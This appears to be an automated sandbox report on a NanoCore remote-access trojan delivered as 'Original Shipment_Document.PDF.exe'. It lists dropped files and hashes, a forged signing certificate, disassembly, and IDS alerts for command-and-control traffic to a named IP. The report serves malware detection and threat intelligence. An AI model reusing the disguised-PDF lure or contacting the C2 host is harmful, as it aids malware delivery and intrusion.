Encrypted:	false
SSDEEP:	24:2dH4+S/4oL600QlMhEMjn5pwjVLUYODOLG9RJh7h8gK0mnJxtn:cbk4oL600QydbQxIYODOLedq3ZJj
MD5:	497F298FC157762F192A7C42854C6FB6
SHA1:	04BEC630F5CC64EA17C0E3E780B3CCF15A35C6E0
SHA-256:	3462CBE62FBB64FC53A0FCF97E43BAAFE9DD9929204F586A86AFE4B89D8048A6
SHA-512:	C7C6FD3097F4D1CCD313160FEDF7CB031644E0836B8C3E25481095E5F4B003759BC84FC6EA9421E3A090E66DC2FF875FEC2F394A386691AB178CB164733411B2
Malicious:	true
Preview:	<?xml version="1.0" encoding="UTF-16"?>..<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">.. <RegistrationInfo />.. <Triggers />.. <Principals>.. <Principal id="Author">.. <LogonType>InteractiveToken</LogonType>.. <RunLevel>HighestAvailable</RunLevel>.. </Principal>.. </Principals>.. <Settings>.. <MultipleInstancesPolicy>Parallel</MultipleInstancesPolicy>.. <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>.. <StopIfGoingOnBatteries>false</StopIfGoingOnBatteries>.. <AllowHardTerminate>true</AllowHardTerminate>.. <StartWhenAvailable>false</StartWhenAvailable>.. <RunOnlyIfNetworkAvailable>false</RunOnlyIfNetworkAvailable>.. <IdleSettings>.. <StopOnIdleEnd>false</StopOnIdleEnd>.. <RestartOnIdle>false</RestartOnIdle>.. </IdleSettings>.. <AllowStartOnDemand>true</AllowStartOnDemand>.. <Enabled>true</Enabled>.. <Hidden>false</Hidden>.. <RunOnlyIfIdle>false</RunOnlyIfIdle>.. <Wak

C:\Users\user\AppData\Roaming\11389406-0377-47ED-98C7-D564E683C6EB\catalog.dat

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe
File Type:	data
Category:	dropped
Size (bytes):	232
Entropy (8bit):	7.089541637477408
Encrypted:	false
SSDEEP:	3:XrURGizD7cnRNGbgCFKRNX/pBK0jCV83ne+VdWPiKgmR7kkmefoeLBizbCuVkqYM:X4LDAnybgCFcps0OafmCYDlizZr/i/Oh
MD5:	9E7D0351E4DF94A9B0BADCEB6A9DB963
SHA1:	76C6A69B1C31CEA2014D1FD1E222A3DD1E433005
SHA-256:	AAFC7B40C5FE680A2BB549C3B90AABAAC63163F74FFFC0B00277C6BBFF88B757
SHA-512:	93CCF7E046A3C403ECF8BC4F1A8850BA0180FE18926C98B297C5214EB77BC212C8FBCC58412D0307840CF2715B63BE68BACDA95AA98E82835C5C53F17EF38511
Malicious:	false
Preview:	Gj.h\.3.A...5.x..&...i+..c(1.P..P.cLT...A.b........4h...t.+..Z\.. .i.... S....}FF.2...h.M+....L.#.X..+......*....~f.G0^..;....W2.=...K.~.L..&f...p............:7rH}..../H......L...?...A.K...J.=8x!....+.2e'..E?.G......[.&

C:\Users\user\AppData\Roaming\11389406-0377-47ED-98C7-D564E683C6EB\run.dat

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe
File Type:	Non-ISO extended-ASCII text, with no line terminators
Category:	dropped
Size (bytes):	8
Entropy (8bit):	3.0
Encrypted:	false
SSDEEP:	3:cJl:kl
MD5:	9817B1B163B64F70946CBDB1318DA30F
SHA1:	7491F8C50AA2E73D37B8C80EA0E11507F8F9A7F6
SHA-256:	14E0030F69EE0F50E4A910B02EA095BAACAC38E83ED955B3AD5E482A5CF33641
SHA-512:	4A8D2C5B840C9FEA10D90C9ADA3A55D9476F1DFF2294D16C01716BB342A61F5A297CF5C4B42B95DCD957BFCEF816035A6A53B3C562D66AD9CC9A72F477F94003
Malicious:	true
Preview:	....v.H

C:\Users\user\AppData\Roaming\11389406-0377-47ED-98C7-D564E683C6EB\settings.bin

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe
File Type:	data
Category:	dropped
Size (bytes):	40
Entropy (8bit):	5.153055907333276
Encrypted:	false
SSDEEP:	3:9bzY6oRDT6P2bfVn1:RzWDT621
MD5:	4E5E92E2369688041CC82EF9650EDED2
SHA1:	15E44F2F3194EE232B44E9684163B6F66472C862
SHA-256:	F8098A6290118F2944B9E7C842BD014377D45844379F863B00D54515A8A64B48
SHA-512:	1B368018907A3BC30421FDA2C935B39DC9073B9B1248881E70AD48EDB6CAA256070C1A90B97B0F64BBE61E316DBB8D5B2EC8DBABCD0B0B2999AB50B933671ECB
Malicious:	false
Preview:	9iH...}Z.4..f.~a........~.~.......3.U.

C:\Users\user\AppData\Roaming\11389406-0377-47ED-98C7-D564E683C6EB\storage.dat

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe
File Type:	data
Category:	dropped
Size (bytes):	426832
Entropy (8bit):	7.999527918131335
Encrypted:	true
SSDEEP:	6144:zKfHbamD8WN+JQYrjM7Ei2CsFJjyh9zvgPonV5HqZcPVT4Eb+Z6no3QSzjeMsdF/:zKf137EiDsTjevgArYcPVLoTQS+0iv
MD5:	653DDDCB6C89F6EC51F3DDC0053C5914
SHA1:	4CF7E7D42495CE01C261E4C5C4B8BF6CD76CCEE5
SHA-256:	83B9CAE66800C768887FB270728F6806CBEBDEAD9946FA730F01723847F17FF9
SHA-512:	27A467F2364C21CD1C6C34EF1CA5FFB09B4C3180FC9C025E293374EB807E4382108617BB4B97F8EBBC27581CD6E5988BB5E21276B3CB829C1C0E49A6FC9463A0
Malicious:	false
Preview:	..g&jo...IPg...GM....R>i...o...I.>.&.r{....8...}...E....v.!7.u3e.. .....db...}.......".t(.xC9.cp.B....7...'.......%......w.^.._.......B.W%.<..i.0.{9.xS...5...)..w..$..C..?`F..u.5.T.X.w'Si..z.n{...Y!m...RA...xg....[7...z..9@.K.-...T..+.ACe....R....enO.....AoNMT.\^....}H&..4I...B.:..@..J...v..rI5..kP......2j....B..B.~.T..>.c..emW;Rn<9..[.r.o....R[....@=...:...L.g<.....I..%4[.G^.~.l'......v.p&.........+..S...9d/.{..H.`@.1..........f.\s...X.a.].<.h...J4...k.x....%3.......3.c..?%....>.!.}..)(.{...H...3..`'].Q.[sN..JX(.%pH....+......(...v.....H...3..8.a_..J..?4...y.N(..D.h..g.jD..I...44Q?..N......oX.A......l...n?./..........$.!..;.^9"H...........OkF....v.m_.e.v..f...."..bq{.....O.-....%R+...-..P.i..t5....2Z# ...#...,L..{..j..heT -=Z.P;...g.m)<owJ].J..../.p..8.u8.&..#.m9...j%..g&....g.x.I,....u.[....>./W...........X...bZ...ex.0..x.}.....Tb...[..H_M._.^N.d&...g._."@4N.pDs].GbT.......&p........Nw...%$=.....{..J.1....2....<E{..<!G..

C:\Users\user\AppData\Roaming\11389406-0377-47ED-98C7-D564E683C6EB\task.dat

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	56
Entropy (8bit):	4.745141646068962
Encrypted:	false
SSDEEP:	3:oMty8WbSmm:oMLWumm
MD5:	F781103B538E4159A8F01E3BE09B1F8D
SHA1:	27992585DE22A095BABCFD75E8F96710DD921C37
SHA-256:	BEA91983791C26C19AA411B2870E89AFC250EAF9855B6E1CE7BEA02B74E7F368
SHA-512:	D50AE0A01E74FC263B704FADE17CDF4993B61E34FD498827D546F090CE2DA5E8F24D4D34FBF360AE7EE5C5E7E3F032F3DDA8AD0C2A2CF0E1DAFEED61258AB4CA
Malicious:	false
Preview:	C:\Windows\Microsoft.NET\Framework\v2.0.50727\caspol.exe

C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\timelrer\Tdlen\Integrationsprvens.Adg72

Download File

Process:	C:\Users\user\Desktop\Original Shipment_Document.PDF.exe
File Type:	ASCII text, with very long lines, with no line terminators
Category:	dropped
Size (bytes):	56802
Entropy (8bit):	3.999776572782735
Encrypted:	false
SSDEEP:	1536:MiSOEpxqtPV0vXzt3Ov2Kh2+ir/qY3TAK7tgjofP:QpeSPztK2YVK7iE
MD5:	7C22C978F9497BB753456B3AA833F7DE
SHA1:	5566F37ED12035AD659E8E71B09A46FC3A907D27
SHA-256:	8126292C7A2EE04C5D5286BCD0584CF8FF39745F17E28DE70A72CBF1EBCA900B
SHA-512:	C33B835EFC5EB8C19A6429E588D8BD6BBD6C26DA379B7F24A6322CDF09094DF777C7C1DBB0B41E43EE5F24D5A11374E2D95135E70EC4285C0C28A8D3F764424B
Malicious:	false
Preview:	751B5626ED1D59DCECA17FC07B6590E02267FE3B2CD7A757A3164D2442E94F22E7417624324FB00CADEF5E125A7A344E60BED74BC30F36CD1FC851B3AD4732C6EA226EB072F8E714BFA6387A8D207880017E9AC6FEEBE6A73C2845B2010C4322E8DC529575F955085F49CFD5389BA20DB5FE9CCA8B739E136A7672B5D2F4472D326B8961AC7A1D2BE941B3207256738921359864F7DCD7AEC49C3C1E7CC69AF9A2AF9CB338F2002503BA46ECAC9CB7044F3290D90BAC2852B3BB0083DC03E4D5EBA5CEA9D0A787F3862CCD2C6EC3325DEACC5CB5818C829C68E98E4C9833F007B86693B4C6776056B342C33E34C5201C378F536C73A444DA46B37933404F6CDE80F0FF3BEE724769B921E9A924F35714874EB7DC63C16604B0487C1A2F1D201C1C8B5CD77378607E2DF7037056A2043753275C1A55BA8CD1CFEC4571E57D5A2331ED816A72AD23FF030A715BC4CDEF157B56B25E576F4F59EB903849D9446368C20AC6283FDD2627141ED25B1A794C55D1FDD15E1F6F5B78A58957BA7871754426D16868771513FAD305AEA8DD85058FC14F2437A34BBC4DEBA70E52D1ACE512EA32218DFED4211F0B5EA40ECD74C2062AA179E6DD0BBE910ADAA8CC1974916BD62BE762ED036F9C2A8BDF043DBB4411C94797F2B82DE9BA0A257AC9E7458DE83CC1AAF0A8D0249200F483B276BFE5D91DFE0787

C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\timelrer\Tdlen\format-text-bold-symbolic.svg

Download File

Process:	C:\Users\user\Desktop\Original Shipment_Document.PDF.exe
File Type:	SVG Scalable Vector Graphics image
Category:	dropped
Size (bytes):	1330
Entropy (8bit):	4.276818433927216
Encrypted:	false
SSDEEP:	24:2dPnnxu3tlACrmYbJ1BtxhUuLos3CrmYbJ1qtxhUuLosN:cfnz6XXNUuLos36XcNUuLosN
MD5:	B0BE3814C6303C5B8C080D654FDF2EA7
SHA1:	8231CACDA98442D068D80EC063CE75DC05AE7A2E
SHA-256:	4A71E8903E3673A98AB8D8BAC7579F7EA2D8C016ADC7ABC6EA23F5565D8643DA
SHA-512:	62F55F19DFE1A8D9B12CD4968401CA19ED332298FBA3ED9DCF714F5E41BA41ED1F8DE07F9F55C90E6B461B73A5F34C2E9C4F505B736960BE814ACB3779F6937A
Malicious:	false
Preview:	<?xml version="1.0" encoding="UTF-8"?>.<svg height="16px" viewBox="0 0 16 16" width="16px" xmlns="http://www.w3.org/2000/svg">. <g fill="#2e3436">. <path d="m 5 3 v 2 h 6 c 0.429688 0 1 0.613281 1 1 v 1 h -5 c -0.917969 0 -1.734375 0.378906 -2.25 0.964844 c -0.515625 0.585937 -0.742188 1.324218 -0.738281 2.046875 c 0.007812 0.71875 0.246093 1.445312 0.757812 2.027343 c 0.515625 0.578126 1.320313 0.960938 2.230469 0.960938 h 7 v -7 c 0 -1.632812 -1.320312 -3 -3 -3 z m 2 6 h 5 v 2 h -5 c -0.398438 0 -0.578125 -0.117188 -0.730469 -0.289062 c -0.152343 -0.167969 -0.253906 -0.441407 -0.257812 -0.722657 c 0 -0.277343 0.09375 -0.539062 0.238281 -0.703125 c 0.148438 -0.164062 0.328125 -0.285156 0.75 -0.285156 z m 0 0"/>. <path d="m 4 3 v 2 h 5 c 0.429688 0 1 0.613281 1 1 v 1 h -5 c -0.917969 0 -1.734375 0.378906 -2.25 0.964844 c -0.515625 0.585937 -0.742188 1.324218 -0.738281 2.046875 c 0.007812 0.71875 0.246093 1.445312 0.757812 2.027343 c 0.515625 0.578126 1.320313 0.960938

C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\timelrer\Tdlen\location-services-disabled-symbolic.symbolic.png

Download File

Process:	C:\Users\user\Desktop\Original Shipment_Document.PDF.exe
File Type:	PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced
Category:	dropped
Size (bytes):	285
Entropy (8bit):	7.002882763277556
Encrypted:	false
SSDEEP:	6:6v/lhPysuci+aOXTk585U+UliBie7cQkF2HTtWAJdp:6v/7Oci+aOogUVli9AZWBz
MD5:	91B30844C5145188A9DCE697271B8BCF
SHA1:	69C3F0AFA91A3E725A26017EC282499152500DC9
SHA-256:	3B79DEE63724F1BAFFB1E51D55CB96CEB2849C0536000BE3A6C848CE36230049
SHA-512:	6AAF7F986B121484A96B3C85CA382A471DC2B6CFC87C7D7C1838714217C17199649A98825AFF70E62CD0DC2E9C6A3DDF41E4CC743CD44977A452F494340BD7C7
Malicious:	false
Preview:	.PNG........IHDR................a....sBIT....\|.d.....IDAT8...1J.A........Q...!.I....V.B:.Li.5.F0'.Hi'X.....h.op\t...S..vwh...t..a...^1B/C..2....:Y..W.E.Kl`.W.......@......w..s&..x..V*.Y3..c.\|e.......%.......y..).y8P#c..3.xL..`..c..{......S...R.1.~.....di....W-z._.....IEND.B`.

C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\timelrer\Tdlen\uforfrdetheden.Rid

Download File

Process:	C:\Users\user\Desktop\Original Shipment_Document.PDF.exe
File Type:	data
Category:	dropped
Size (bytes):	99762
Entropy (8bit):	7.345890691572136
Encrypted:	false
SSDEEP:	1536:C42UhrrhyVKSRG5jbu3E4CIJB8SkPoVcrlCDh4AusPrji0Dz:GG0KSRCnu3E9qdbos94AuuPP/
MD5:	251EE827C992B4E481634030C2E681F3
SHA1:	88065FA2EDAE7B94B6891675DF8A9028DC5F28E6
SHA-256:	E9DD8E6A46B89E22E83743D0578339458E7C2CE719BFF5FDD9FDC66652DB161A
SHA-512:	6042BAD2119F19C0355DC43C7CC0F03A5943C524252DC7F0DA0FF4ED254D9486EC3C485BBF0D8010CF5CBF2A22B5F2BFFA8247D87EEFFEF91A72B891FCFAD49D
Malicious:	false
Preview:	Y.!&.Z....o.....-....D....8.)8E^.+.....a..7..[?cH.Y...d..[....2R.&..f.....,t.y.OO..q.>..@.%..r...h,.N.~xh......&..{.....6.pR2cM...tM8X.1....q.......;).../0.u...f}...j}.3......+[._.`VS..U+!yoY........?R...Z..X.i...o....O.}...9.`F.e>~.%...E..Z...(?...........j..^zC.>...\.n.3."f....V;......,....&...-.#...,c....\3Z......}^!..[A....Y.U./Rz....a.....\|......:5p...._.[...g....B&.-....T.WF..dY..^.Z..W/.......M.V. ......:I...A.........{.5.....2f5A......W.p.T..9K..n3.Js..N<.L.W...=Hv.8Q.d.(.H!`k.aO....Y....s....l.1.A`H.P<u.Z4..).0.n.......M/GL..JjD.;.P.... .;.H..h.7D.\|..e..(._WTD......:<J^..a....Eq]}.f....t...J&.:d+t......5.)]'.ww..`.A...q....!.....Y..7...X.p.y.D...].y...P.=pc..V&T. `W}B.....%..D."...P....#..,...:.&."4$1..e.9Z......F2."mTM....~...g.....c..%".T...q..$_l...#j..:t...."...t=.e.....@.U.i.U..Bj.....E#...~.r.<....,.UP5t..@e....G....H......7Ye..i......^......9..4C.o.3..F'..A..e..=.u..Bw.6S..^..]..v..&.....<)$On.UxV5.+:..vh....a.q..R...e

\Device\ConDrv

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	182
Entropy (8bit):	5.07060597644582
Encrypted:	false
SSDEEP:	3:RGXKRjN3Mxm8d/AjhclROXDD9jmKXVM8/FOoDamd9xraWMZ4MKLJFcLEWgJya7:zx3M7ucLOdBXVNYmd9NaWM6MKnH5JyY
MD5:	B08826036A3E81B44E7D8C1284381013
SHA1:	96CF7E6BC1B55C69CE33BEC3B78FFF4EB8839B87
SHA-256:	E7AD5092F56BB2ACA26262C361FE5F83171D21AB134D4E5D2EF47E9BF641B549
SHA-512:	EB9908F6FB6398EDCE4F3B18AA64ABEE8774D1CA3A5B533617C97AAC5E795627CCB8B1176BE64371E6BEF6352004FC2B4862A388D61A6103D05B5B2D02CD0481
Malicious:	false
Preview:	Microsoft (R) .NET Framework CasPol 2.0.50727.9149..Copyright (c) Microsoft Corporation. All rights reserved.....ERROR: Invalid option: 0....For usage information, use 'caspol -?'..

Static File Info

General

File type:	PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
Entropy (8bit):	6.715600015491742
TrID:	Win32 Executable (generic) a (10002005/4) 99.96% Generic Win/DOS Executable (2004/3) 0.02% DOS Executable Generic (2002/1) 0.02% Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name:	Original Shipment_Document.PDF.exe
File size:	341696
MD5:	626cdeaa4696c819fd07921073f6c740
SHA1:	b094f5e4c3792a05b7f307ad78d2e52cfcbf87b4
SHA256:	d8519cee2bbf5c257375b339d530b33f275db40c06de0f96911eb5b4f207f2c5
SHA512:	2cbfa1d322bd8b6bd861c97f43ef4778a6ef2fb86b718f2571b54f1ce5874afbdf3a9e1728986c7593eb7f48b2defcff624ac467a5ff2677d9036093edaf88f0
SSDEEP:	6144:JNeZc5FBkXpIwbmr2KEROaPdEY8mff3PgRsmq:JNRTr2KEROoT8mfH+q
TLSH:	9F741AC1E199FCD5C428007659B9E521251BAB6EF0B8493B396A7519B0FF383607BE0F
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........1...Pf..Pf..Pf._9..Pf..Pg.LPf._;..Pf..sV..Pf..V`..Pf.Rich.Pf.........................PE..L.....Oa.................f...*.....

File Icon


Icon Hash:	ccc0d4ccccdc6cb4

Static PE Info

General

Entrypoint:	0x4034f7
Entrypoint Section:	.text
Digitally signed:	true
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
DLL Characteristics:	DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Time Stamp:	0x614F9AE5 [Sat Sep 25 21:55:49 2021 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	4
OS Version Minor:	0
File Version Major:	4
File Version Minor:	0
Subsystem Version Major:	4
Subsystem Version Minor:	0
Import Hash:	56a78d55f3f7af51443e58e0ce2fb5f6

Authenticode Signature

Signature Valid:	false
Signature Issuer:	CN="Slnggrebets Buginese Itemizer ", OU="Louped Estes ", E=Kodeskrifter@Blakkers.For, O=Kedging, L=Bury, S=England, C=GB
Signature Validation Error:	A certificate chain processed, but terminated in a root certificate which is not trusted by the trust provider
Error Number:	-2146762487
Not Before, Not After	30/09/2021 15:49:03 29/09/2024 15:49:03
Subject Chain	CN="Slnggrebets Buginese Itemizer ", OU="Louped Estes ", E=Kodeskrifter@Blakkers.For, O=Kedging, L=Bury, S=England, C=GB
Version:	3
Thumbprint MD5:	9531A5E4D76383B4586733B6369AA05A
Thumbprint SHA-1:	EB1025208E0319CC8EEFE675D7F0134D108F989B
Thumbprint SHA-256:	1860FBBE1C07E5046864295E0AE0BA476642D85716E6DDB0C4D6E2BF3405DB86
Serial:	2A16DD32E2795EBB

Entrypoint Preview

Instruction
push ebp
mov ebp, esp
sub esp, 000003F4h
push ebx
push esi
push edi
push 00000020h
pop edi
xor ebx, ebx
push 00008001h
mov dword ptr [ebp-14h], ebx
mov dword ptr [ebp-04h], 0040A2E0h
mov dword ptr [ebp-10h], ebx
call dword ptr [004080CCh]
mov esi, dword ptr [004080D0h]
lea eax, dword ptr [ebp-00000140h]
push eax
mov dword ptr [ebp-0000012Ch], ebx
mov dword ptr [ebp-2Ch], ebx
mov dword ptr [ebp-28h], ebx
mov dword ptr [ebp-00000140h], 0000011Ch
call esi
test eax, eax
jne 00007F1A605152FAh
lea eax, dword ptr [ebp-00000140h]
mov dword ptr [ebp-00000140h], 00000114h
push eax
call esi
mov ax, word ptr [ebp-0000012Ch]
mov ecx, dword ptr [ebp-00000112h]
sub ax, 00000053h
add ecx, FFFFFFD0h
neg ax
sbb eax, eax
mov byte ptr [ebp-26h], 00000004h
not eax
and eax, ecx
mov word ptr [ebp-2Ch], ax
cmp dword ptr [ebp-0000013Ch], 0Ah
jnc 00007F1A605152CAh
and word ptr [ebp-00000132h], 0000h
mov eax, dword ptr [ebp-00000134h]
movzx ecx, byte ptr [ebp-00000138h]
mov dword ptr [0042A2D8h], eax
xor eax, eax
mov ah, byte ptr [ebp-0000013Ch]
movzx eax, ax
or eax, ecx
xor ecx, ecx
mov ch, byte ptr [ebp-2Ch]
movzx ecx, cx
shl eax, 10h
or eax, ecx

Rich Headers

Programming Language:

[EXP] VC++ 6.0 SP5 build 8804

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0x8504	0xa0	.rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x52000	0x2eec8	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x52fb0	0x710	.rsrc
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x0	0x0
IMAGE_DIRECTORY_ENTRY_DEBUG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x8000	0x2b0	.rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x1000	0x6515	0x6600	False	0.6615349264705882	data	6.439707948554623	IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rdata	0x8000	0x139a	0x1400	False	0.45	data	5.145774564074664	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data	0xa000	0x20338	0x600	False	0.4993489583333333	data	4.013698650446401	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.ndata	0x2b000	0x27000	0x0	False	0	empty	0.0	IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rsrc	0x52000	0x2eec8	0x2f000	False	0.3425500748005319	data	5.305541691795029	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type	Language	Country
RT_ICON	0x52340	0x10828	dBase IV DBT, blocks size 0, block length 2048, next free block index 40, next free block 0, next used block 0	English	United States
RT_ICON	0x62b68	0x94a8	data	English	United States
RT_ICON	0x6c010	0x6cb4	PNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced	English	United States
RT_ICON	0x72cc8	0x5488	data	English	United States
RT_ICON	0x78150	0x4228	dBase IV DBT of \200.DBF, blocks size 0, block length 16896, next free block index 40, next free block 254, next used block 1056964608	English	United States
RT_ICON	0x7c378	0x25a8	data	English	United States
RT_ICON	0x7e920	0x10a8	data	English	United States
RT_ICON	0x7f9c8	0x988	data	English	United States
RT_ICON	0x80350	0x468	GLS_BINARY_LSB_FIRST	English	United States
RT_DIALOG	0x807b8	0x100	data	English	United States
RT_DIALOG	0x808b8	0x11c	data	English	United States
RT_DIALOG	0x809d8	0xc4	data	English	United States
RT_DIALOG	0x80aa0	0x60	data	English	United States
RT_GROUP_ICON	0x80b00	0x84	data	English	United States
RT_MANIFEST	0x80b88	0x33e	XML 1.0 document, ASCII text, with very long lines, with no line terminators	English	United States

Imports

DLL	Import
ADVAPI32.dll	RegCreateKeyExW, RegEnumKeyW, RegQueryValueExW, RegSetValueExW, RegCloseKey, RegDeleteValueW, RegDeleteKeyW, AdjustTokenPrivileges, LookupPrivilegeValueW, OpenProcessToken, SetFileSecurityW, RegOpenKeyExW, RegEnumValueW
SHELL32.dll	SHGetSpecialFolderLocation, SHFileOperationW, SHBrowseForFolderW, SHGetPathFromIDListW, ShellExecuteExW, SHGetFileInfoW
ole32.dll	OleInitialize, OleUninitialize, CoCreateInstance, IIDFromString, CoTaskMemFree
COMCTL32.dll	ImageList_Create, ImageList_Destroy, ImageList_AddMasked
USER32.dll	GetClientRect, EndPaint, DrawTextW, IsWindowEnabled, DispatchMessageW, wsprintfA, CharNextA, CharPrevW, MessageBoxIndirectW, GetDlgItemTextW, SetDlgItemTextW, GetSystemMetrics, FillRect, AppendMenuW, TrackPopupMenu, OpenClipboard, SetClipboardData, CloseClipboard, IsWindowVisible, CallWindowProcW, GetMessagePos, CheckDlgButton, LoadCursorW, SetCursor, GetSysColor, SetWindowPos, GetWindowLongW, PeekMessageW, SetClassLongW, GetSystemMenu, EnableMenuItem, GetWindowRect, ScreenToClient, EndDialog, RegisterClassW, SystemParametersInfoW, CreateWindowExW, GetClassInfoW, DialogBoxParamW, CharNextW, ExitWindowsEx, DestroyWindow, CreateDialogParamW, SetTimer, SetWindowTextW, PostQuitMessage, SetForegroundWindow, ShowWindow, wsprintfW, SendMessageTimeoutW, FindWindowExW, IsWindow, GetDlgItem, SetWindowLongW, LoadImageW, GetDC, ReleaseDC, EnableWindow, InvalidateRect, SendMessageW, DefWindowProcW, BeginPaint, EmptyClipboard, CreatePopupMenu
GDI32.dll	SetBkMode, SetBkColor, GetDeviceCaps, CreateFontIndirectW, CreateBrushIndirect, DeleteObject, SetTextColor, SelectObject
KERNEL32.dll	GetExitCodeProcess, WaitForSingleObject, GetModuleHandleA, GetProcAddress, GetSystemDirectoryW, lstrcatW, Sleep, lstrcpyA, WriteFile, GetTempFileNameW, CreateFileW, lstrcmpiA, RemoveDirectoryW, CreateProcessW, CreateDirectoryW, GetLastError, CreateThread, GlobalLock, GlobalUnlock, GetDiskFreeSpaceW, WideCharToMultiByte, lstrcpynW, lstrlenW, SetErrorMode, GetVersionExW, GetCommandLineW, GetTempPathW, GetWindowsDirectoryW, SetEnvironmentVariableW, CopyFileW, ExitProcess, GetCurrentProcess, GetModuleFileNameW, GetFileSize, GetTickCount, MulDiv, SetFileAttributesW, GetFileAttributesW, SetCurrentDirectoryW, MoveFileW, GetFullPathNameW, GetShortPathNameW, SearchPathW, CompareFileTime, SetFileTime, CloseHandle, lstrcmpiW, lstrcmpW, ExpandEnvironmentStringsW, GlobalFree, GlobalAlloc, GetModuleHandleW, LoadLibraryExW, MoveFileExW, FreeLibrary, WritePrivateProfileStringW, GetPrivateProfileStringW, lstrlenA, MultiByteToWideChar, ReadFile, SetFilePointer, FindClose, FindNextFileW, FindFirstFileW, DeleteFileW

Possible Origin

Language of compilation system	Country where language is spoken	Map
English	United States

Network Behavior

Snort IDS Alerts

Timestamp	Protocol	SID	Message	Source Port	Dest Port	Source IP	Dest IP
192.168.11.20188.127.230.1764983847262816766 08/05/22-11:35:49.166459	TCP	2816766	ETPRO TROJAN NanoCore RAT CnC 7	49838	4726	192.168.11.20	188.127.230.176
192.168.11.20188.127.230.1764982847262816766 08/05/22-11:35:00.505316	TCP	2816766	ETPRO TROJAN NanoCore RAT CnC 7	49828	4726	192.168.11.20	188.127.230.176
192.168.11.20188.127.230.1764987847262816766 08/05/22-11:39:25.478451	TCP	2816766	ETPRO TROJAN NanoCore RAT CnC 7	49878	4726	192.168.11.20	188.127.230.176
192.168.11.20188.127.230.1764980847262816766 08/05/22-11:33:35.611490	TCP	2816766	ETPRO TROJAN NanoCore RAT CnC 7	49808	4726	192.168.11.20	188.127.230.176
192.168.11.20188.127.230.1764981247262816766 08/05/22-11:33:54.948742	TCP	2816766	ETPRO TROJAN NanoCore RAT CnC 7	49812	4726	192.168.11.20	188.127.230.176
192.168.11.20188.127.230.1764988847262816766 08/05/22-11:40:18.857309	TCP	2816766	ETPRO TROJAN NanoCore RAT CnC 7	49888	4726	192.168.11.20	188.127.230.176
192.168.11.20188.127.230.1764985547262816766 08/05/22-11:37:25.064645	TCP	2816766	ETPRO TROJAN NanoCore RAT CnC 7	49855	4726	192.168.11.20	188.127.230.176
192.168.11.20188.127.230.1764986547262816766 08/05/22-11:38:18.642662	TCP	2816766	ETPRO TROJAN NanoCore RAT CnC 7	49865	4726	192.168.11.20	188.127.230.176
192.168.11.20188.127.230.1764982247262816766 08/05/22-11:34:32.402122	TCP	2816766	ETPRO TROJAN NanoCore RAT CnC 7	49822	4726	192.168.11.20	188.127.230.176
192.168.11.20188.127.230.1764983247262816766 08/05/22-11:35:25.408580	TCP	2816766	ETPRO TROJAN NanoCore RAT CnC 7	49832	4726	192.168.11.20	188.127.230.176
192.168.11.20188.127.230.1764980847262025019 08/05/22-11:33:34.751911	TCP	2025019	ET TROJAN Possible NanoCore C2 60B	49808	4726	192.168.11.20	188.127.230.176
192.168.11.20188.127.230.1764984247262816766 08/05/22-11:36:13.005262	TCP	2816766	ETPRO TROJAN NanoCore RAT CnC 7	49842	4726	192.168.11.20	188.127.230.176
